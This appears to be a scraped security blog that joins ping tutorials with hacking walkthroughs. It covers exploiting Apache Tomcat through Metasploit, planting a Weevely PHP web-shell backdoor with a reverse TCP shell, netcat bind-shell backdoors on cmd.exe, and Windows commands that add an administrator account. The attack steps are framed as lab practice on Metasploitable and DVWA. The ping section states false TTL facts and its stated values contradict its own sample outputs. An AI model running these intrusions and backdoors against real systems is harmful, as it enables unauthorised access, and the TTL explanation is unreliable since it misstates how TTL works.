PING - Network Tool Tutorial - 3

Before reading this tutorial please go through Part - 1 & Part - 2

In previous tutorial we seen

ping gives us three major information

-Host Reachability

-Network Congestion

-Time To Live

in that we discussed about what is "Host Reachability", Now we will be seeing Network Congestion

Network Congestion:

Another very precious information provided by the Ping command is the time taken for a packet to reach the destination and come back. This measure is called the RTT (Round Trip Time) or "response time" and is displayed in milliseconds. 

It should not be mistaken for the latency or delay defined as the one-way time taken for a packet to travel across the network between two hosts. 

The response time will affect network applications performance. High response times will lead to poor performances.

When a network application is slow, a first basic troubleshooting step is to get the reponse time between the client and the server to know if the network is the reason of the slowness. 

We should not forget another information related to the response time: the packet loss. A packet is declared as lost if the ICMP message has been discard on the way or if is returned after the timeout value equal to 2 seconds by default. Packet losses will lead to a high TCP retransmission rate with the consequence of a slow or interrupted network application.

In a LAN environment, there shouldn't be any packet loss.

What affects the response time and Packet loss?

-The Network Media

-Network Devices

-Physical Remoteness

-Source and Destination Devices

Time - to - Live

The TTL or Time-To-Live gives you an indication of the number of routers between the source and destination. 

The TTL is used to prevent an IP packet from looping inside an IP network and causing a network meltdown. 

The initial TTL packet value for an IP packet is 255 and then it is decremented by 1 each time it encounters a router. When this value reaches 0, the packet is discarded by a router. The TTL value is contained in each IP packet including ICMP packets. The TTL value given by the ping command is in fact the TTL value of an echo_response packet. 

By default, Windows will decrease the TTL by 128 and Ubuntu Linux by 192.

Let us study three scenarios where A pings B. B is a router (first case), 

A Microsoft Windows machine (case 2) and a Ubuntu Linux machine (case 3). 

The TTL value is initially 255 and then decreased as described as above.

Case 1:

When A pings B, it receives a TTL of 251 because the packets crossed 4 routers (-4).

TTL=255-4=251.  

PING B

Pinging B [1.1.1.1] with 32 bytes of data: 

Reply from 1.1.1.1: bytes=32 time=18 ms TTL=251 

Reply from 1.1.1.1: bytes=32 time=21 ms TTL=251 

Reply from 1.1.1.1: bytes=32 time=20 ms TTL=251 

Reply from 1.1.1.1: bytes=32 time=33 ms TTL=251 

Ping statistics for 1.1.1.1: 

      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 

Approximate round trip times in milli-seconds: 

      Minimum = 18ms, Maximum = 33ms, Average = 23ms

-------------------------------------------------------

Case 2:

When A pings B, it receives a TTL of 124 because the packets crossed 3 routers (-3) and a Windows machine (-128).

TTL=255-3-128=124.

PING B

Pinging B [1.1.1.1] with 32 bytes of data: 

Reply from 1.1.1.1: bytes=32 time=18 ms TTL=125 

Reply from 1.1.1.1: bytes=32 time=21 ms TTL=125 

Reply from 1.1.1.1: bytes=32 time=20 ms TTL=125 

Reply from 1.1.1.1: bytes=32 time=33 ms TTL=125 

Ping statistics for 1.1.1.1: 

      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 

Approximate round trip times in milli-seconds: 

      Minimum = 18ms, Maximum = 33ms, Average = 23m 

------------------------

Case 3:

When A pings B, it receives a TTL of 62 because the packets crossed 3 routers (-3) and an Ubuntu machine (-192).

TTL=255-3-192=60. 

PING B

Pinging B [1.1.1.1] with 32 bytes of data: 

Reply from 1.1.1.1: bytes=32 time=18 ms TTL=60 

Reply from 1.1.1.1: bytes=32 time=21 ms TTL=60 

Reply from 1.1.1.1: bytes=32 time=20 ms TTL=60 

Reply from 1.1.1.1: bytes=32 time=33 ms TTL=60 

Ping statistics for 1.1.1.1: 

      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 

Approximate round trip times in milli-seconds: 

      Minimum = 18ms, Maximum = 33ms, Average = 23ms

-------

Use wireshark to go in-depth analysis of PING Command.

(Taken from openmaniak.com)

Read More

PING - Network Tool Tutorial - 2

OUTPUT ANALYSIS:

In previous tutorial PING - Network Tool Tutorial - 1 we seen how PING Command works

if you want to clearly understand about PING command go through Tutorial - 1.

we catched echo_request and echo_response by using wireshark(A Popular Network Sniffing Tool)


ping gives us three major information

-Host Reachability
-Network Congestion
-Time To Live

Host Reachability

The Ping results in the previous tutorial show that four ICMP packets have been sent and four received. This result indicates you that the host is alive at the ICMP level. However, no other information, such as whether or not a a webserver is running, is given.

What's does it mean if I receive a negative result?
Let's see an example:


C:\>ping www.abcdefg.com

Pinging abcdefg.com [192.168.88.15] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.88.15:
      Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

Host www.abcdefg.com, which has IP address 192.168.88.15, did not answer to the Ping command. It's interesting to note that the negative answer does not always mean that the recipient is not alive (in our example, it is alive and runs a webserver). In this case, the result simply means that the host just doesn't answer to ICMP request.

What could be the reason for this "no-answer" ?
It is not always possible to know the exact reason behind a "no-answer". As a matter of fact, there may be a lot of different reasons. In the following picture, we summarize the four major reasons.

In the first case, an external firewall blocks the ICMP requests. ICMP can be used as a first step in an attack because it can determine the alive hosts before attacking. In this case the network behind the firewall is hidden from the external world even it is well alive.

Blocking ICMP messages is a first security recommendation to secure a network. The external firewall is more often used to secure professional network because it is expensive and requires advanced skills for configuring.

In the second case, the workstation has a personal firewall that blocks the ICMP message. A personal firewall is recommended for home computers for the same reasons mentioned above.

In the thrid case, the "pinged" machine is not connected to the IP network, for instance, because the network cable is unplugged.
The echo_request message will be discarded on the last router of the layer 3 device before the remote host.

In the fourth case, the host is down or has its network card deactivated. Such as in the previous case, the echo_request message will die on the last router of the layer 3 device before the remote host.

------------

If a device called Geneva can ping another called Dallas, does it mean that the opposite, in other words Dallas can ping Geneva, is always true?

The response is no. As you can see below, you can have a firewall only preventing echo_request in a single direction.

When Dallas pings Geneva, the ICMP echo_request is blocked on the firewall and Dallas receives no answer from Geneva.

When Geneva pings Dallas, the ICMP echo_request reaches Dallas and Geneva receives the echo_response in return, so the ping is successful. In this case, the ICMP packets are not blocked since the firewall only stops echo_request coming from outside. Here, we have an echo_request from inside and an echo_response from outside.

Remaining things will be seen in tutorial -3..

(Taken from openmaniak.com)

Read More

PING - Network Tool Tutorial - 1

Ping is a well known tool that is used to check the network connectivity between two systems.
ping tool is by default available in both windows,MAC and linux/unix systems.

The ping was created in 1983 by Mike Muuss who wrote an article "The Story of Ping Program" before dying in 2000 in a car accident

The ping uses an ICMP(Internet control message protocol) protocol which has been created to check IP connectivity and get information about other machines in an IP network.

Functioning of PING

Ping sends very small packets to target host who will answer by sending packets back. The ICMP packets send to target host are called as "echo_request" and packets sent back called as "echo_response".

There are also a lot of icmp packets types which are described below

Case Study:

Let's examine a case study where two machines called Paris and Berlin ping a machine called "www.google.ch".

The Wireshark sniffer is located on the way between Berlin and "www.google.ch". It will be used to capture the packets content.

Paris is a Linux Ubuntu machine and Berlin a Microsoft XP Machine

Ping from the Linux machine (Paris) to "www.google.ch":

Paris: ping www.google.ch

PING www.google.ch (209.85.135.105) 56(84) bytes of data.
64 bytes from www.google.ch(209.85.135.105): icmp_seq=1 ttl=255 time=1.19 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=2 ttl=255 time=1.25 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=3 ttl=255 time=1.26 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=4 ttl=255 time=1.29 ms

--- www.google.ch ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 1.192/1.250/1.290/0.044 ms

Ping from the Windows machine (Berlin) to "www.google.ch":

Berlin: ping www.google.ch 

Pinging www.google.ch [209.85.135.105] with 32 bytes of data:

Reply from 209.85.135.105: bytes=32 time=18 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=21 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=20 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=33 ms TTL=250

Ping statistics for 209.85.135.105:
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
      Minimum = 18ms, Maximum = 33ms, Average = 23ms

What information can be learnt from the outputs above?

- Is the remote host alive? => Host reachability
- Is the network speed good? => Network congestion
- Is the remote host far? => Travel length

we will see remaining things "OUTPUT ANALYSIS" for full details about how to interpret the results of the ping command.

We can also say that the Ping tool will provide us the same information independently of the OS on which it is installed. However there are some little differences in the default settings and arguments of the Ping commands.

Let's see a summary of data captured by Wireshark

This Wireshark capture gives us the following information:

- The packets have been recognized as ICMP packets. protocol column
- Four ICMP packets have been sent (echo_request) and four ICMP packets have been received (echo_reply). info column
- A packet value of 74 bytes which is composed of the headers (42 bytes) and the ICMP data part (32 bytes by default on Windows). length column

Remaining things we will be seeing Ping tutorial  2 ..

Read More

WebSploit Framework

Hello Friends,

Today i am discussing about Websploit Framework

Websploit is an automatic vulnerability assessment, web crawler and exploiter tool. It is an open source command line utility that composed on modular structure. At the time of writing, there are 16 modules are available on Websploit, it can be downloaded from sourceforge project website but it is available on Kali Linux by default.

Websploit can be synchronize with Metasploit WMAP project for web vulnerability scanning, there are four categories of modular are available and they are:

Web Modules
Network Modules
Exploit Modules
Wireless Modules

In Wireless module we can run some interesting WiFi attacking vector including the WiFi jammer and WiFi DDOS attack. For exploitation, websploit is working on the basis of Metasploit Autopwn service and metasploit browser autopwn service. A large number of interesting attacking vectors are available on the network modules,

If you are on Kali Linux, then click on Applications ? Kali Linux ? Web Applications ? Web Vulnerability Scanners ? Websploit

The list of commands that can applicable on websploit are:

Read More

Exploit Apache Tomcat

Hello Friends,

Today i am showing you how to exploit apache tomcat machine.

Basic setup we require is

1.VMWare Workstation

2.Metasploitable

3.Kali Linux or Backtrack 5R3

Steps

Start Metasploitable and Kali Linux in VMWare Workstation and see their IP S

Scan Metasploitable IP In Kali Linux using NMAP tool

nmap -sV 192.168.230.133 (Metasploitable IP)

then we will get all services running and versions of service on the target machine 

we finded that "Apache Tomcat" is running on the port number 8180

Now search for related exploit

In kali linux start metasploit and type "search tomcat"

msf >search tomcat

In this select for best exploit

Here " exploit/multi/http/tomcat_mgr_deploy " is excellent

so go with that only , but before going for exploit know about that exploit

To know information about exploit

msf > info exploit/multi/http/tomcat_mgr_deploy

for this exploit to run we require USERNAME and PASSWORD of tomcat server that we do not having

so next once again come to msf

msf > search tomcat

here you having one auxillary that may help in getting USERNAME and PASSWORD

msf > info auxiliary/scanner/http/tomcat_mgr_login

msf > use auxiliary/scanner/http/tomcat_mgr_login

and set RHOST,RPORT and type run (not exploit , we are running auxiliary not the exploit)

 Now you will get the USERNAME and PASSWORD of tomcat

we got the username = tomcat and password = tomcat

After getting username and password use exploit

Now set all options like RHOST etc

Now type EXPLOIT

The box has been exploited

Thank You

Read More

How Strangers Can Read Your Private Facebook Messages

Here's something you probably didn't know: Facebook has a team of employees who read your private messages if they have been flagged by an automated tool. The tool searches for content that appears to violate their terms of service, namely malicious (infected) URLs or child pornography. It's imperfect, of course — that's where humans come in.

If a private message is flagged, actual people will jump in and read it. If there is something that could be illegal — particularly regarding child exploitation — those people contact law enforcement. The intent here is clear and defensible, yet the fact remains: All that stands between your "private" messages and the eyes of a stranger is the snap judgment of an algorithm.

"There are strong internal controls around the use of these tools to prevent misuse and abuse," Facebook told BuzzFeed, "and stringent guidelines for the way we cooperate with law enforcement."

It's not just Facebook. Dating site OkCupid has humans read private messages that have been flagged by its users.Twitter doesn't monitor direct messages either through automated tools or humans.

(Taken from BuzzFeed)

Read More

Creating Web Backdoor using Backtrack(Weevely Tutorial)

Weevely PHP stealth web shell and backdoor is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. It is an essential tool for web application post exploitation, and also can be used as stealth backdoor

Weevely is by defaultly available in OS like Backtrack, Backbox etc.

Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.

weevely is written in python.

Lets Start our Practical

Requirement:

1.Webserver for uploading the backdoor ( i installed dvwa on linux box)

2.Weevely PHP Shell(i.e, available in backtrack 5R3)

Steps to start

1.weevely is available in /pentest/backdoors/web/weevely/

Open terminal and type cd /pentest/backdoors/web/weevely/

2.Generate PHP stealth backdoor

./weevely.py generate security

When we execute this command a new file will be created called weevely.php

3.After generatig file the next step will be upload weevely.php file to webserver and we are uploading it to webserver.

I am using DVWA(Damn Vulnerable Web Application) for testing purpose

4.Now file has been successfully uploaded

5.Now access that weevely .php from terminal

./weevely.py

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security

Now we are in server

6.If we want to see files in that directory type ls

7.if we want to see passwords cat /etc/passwd

8.if we want to see who we are

whoami

9.using weevely for backdoor

here i am opening one more terminal and i am starting netcat

nc -lvp 1234

and in weevely terminal

:backdoor.reverse_tcp 192.168.142.132 1234

now we are connected

now you can access all server files.

thank you.

Read More

Google Fixes Three High-Risk Flaws in Chrome OS

Google has fixed a series of serious vulnerabilities in its Chrome OS, including three high-risk bugs that could be used for code execution on vulnerable machines. As part of its reward program, Google paid out more than $30,000 to a researcher who found three of the vulnerabilities.

All of the vulnerabilities that Google fixed in Chrome OS are in the O3D plugin, an API that enables developers to create 3D applications for the Web. Three of the vulnerabilities are high-risk and the other flaw is rated a medium severity bug.

Here are the vulnerabilities that Google fixed in Chrome OS 26:

[227197] Medium CVE-2013-2832: Uninitialized memory left in buffer in O3D plug-in.Credit to Ralf-Philipp Weinmann.

[227181] High CVE-2013-2833: Use-after-free in O3D plug-in. Credit to Ralf-Philipp Weinmann.

[227158] High CVE-2013-2834: Origin lock bypass of O3D and Google Talk plug-ins. Credit to Ralf-Philipp Weinmann.

[196456] High CVE-2013-2835: Origin lock bypass of O3D and Google Talk plug-ins. Credit to Google Chrome Security Team (Chris Evans).

Ralf-Philipp Weinmann, the researcher who discovered three of the flaws, received $31,336 in bug bounties for his work. That's at the highest end of the rewards that Google pays out in its Chromium reward program. Most of the rewards are in the $1,000-$3,000 range, with some going above that, depending upon the severity of the vulnerability and difficulty of exploitation.

"We’re pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up. We are grateful to Ralf for his work to help keep our users safe," Ben Henry of the Chrome team said in a blog post.

(Taken from Threat Post)

Read More

Burpsuite Tutorial

Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Link to Download: http://portswigger.net/burp/download.html

Burpsuite is available in free version and pro version

Requirements to run burpsuite

--The burpsuite is developed in Java so for burpsuite to run we require JRE, that is available freely on internet

--Burpsuite

Burpsuite free version is available in Backtrack and Kali also.

Burp acts as a web proxy, and allows you to intercept requests and responses, and then modify them before they’re sent along to the server or client. This is very handy stuff for attacking web applications.

The Burp Suite is made up of tools (descriptions take from the Port Swigger website):

Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.

Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Intruder: Burp Intruder is a tool for automating customised attacks against web applications.

Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.

Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.

Comparer: Burp Comparer is a simple tool for performing a comparison (a visual “diff”) between any two items of data. In the context of attacking a web application, this requirement will typically arise when you want to quickly identify the differences between two application responses (for example, between two responses received in the course of a Burp Intruder attack, or between responses to a failed login using valid and invalid usernames), or between two application requests (for example, to identify the different request parameters that give rise to different behaviour).

Read More

One Liner commands for windows

Here i will be mostly working with WMIC.

what is WMIC ?

Windows management instrumentation command. The wmic command to me is one of the more powerful commands on windows. You can do multiple tasks with one command

List of running processes in brief

wmic process list brief

kill a process

wmic process where name="wordpad.exe" delete

Determine open shares

net share
wmic share list brief

Determine ip address

ipconfig

Get a new ip address

ipconfig /release
ipconfig /renew

Disk drive information

wmic diskdrive list full
wmic partition list full

List all patches

wmic qfe

List services

wmic service list brief

List user accounts

wmic useraccount list brief

List number of times a user logged on

wmic netlogin where (name like "%adm%") get numberoflogons

Reboot

shutdown /r /t 0

Shutdown

shutdown /s /t 0

Spawn a new command prompt

start cmd

Command line history

F7

Determine the current user

echo %USERNAME%

Determine who is apart of the administrators group

net localgroup administrators

Add a user where rocky is the username and password is redhat

net user rocky redhat /add

Add user rocky to administrators group

net localgroup administrators rocky /add

List user accounts

net user

List network connections and the programs that make connection

netstat -an

Display contents of file text.txt

type text.txt

Edit contents of file text.txt

edit text.txt

Determine PC name

hostname

Determine whether a system is 32 or 64 bit

wmic cpu get DataWidth /format:list

Startup applications

wmic startup get caption,command

Read More

NETCAT Tutorial

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Netcat  is the tcp/ip "Swiss Army knife".

Netcat is devloped not  for the back door purpose but unfortunately it is using for backdoor .

Net cat is a powerful tool ,it is a simple tool but can do many things 

It can be used as an 

Honeypot

Remote Administration

Chatting Purpose

Port Redirection

Sniffer

Creation of Backdoor

File Transfer and 

Banner Grabbing and many more.

I will be discussing some of the options

LAB:

Windows XP 192.168.142.128

Kali Linux      192.168.142.129

netcat is by default available in Linux Box

nc(netcat) as an Port Scanning Tool

Now i am Scanning XP machine by using nc

nc -v -w 2 -z

nc -v -w 2 -z 192.168.142.128

nc as an Banner Grabbing Tool

nc -v -n

Opening a port and using nc for chatting

nc -lvp 1234

l - listen

v - verbose

p - port number

i am trying to open a port number 1234

in XP Machine type command

nc -lvp 1234

in KALI linux type command

nc

nc 192.168.142.128 1234

and you can start chat

Transferring files using NETCAT

I am having one file in windows machine "hello.txt"

xp machine: nc -lvp 1234 < hello.txt

In Kali linux

I created a blank file "test.txt"

nc > test.txt

nc 192.168.142.128 1234 > test.txt

Netcat as an backdoor

Let us think we hacked a system and we want to create backdoor for remote administration purpose at that time netcat is very much useful

Upload netcat in remote system and run the following command now it will give command prompt to you

nc -L -p 1234 -d -e cmd.exe 

In XP machine : nc -lvp 1234 -e cmd.exe

in Kali : nc 192.168.142.128 1234

you will get command prompt

Thank you

Read More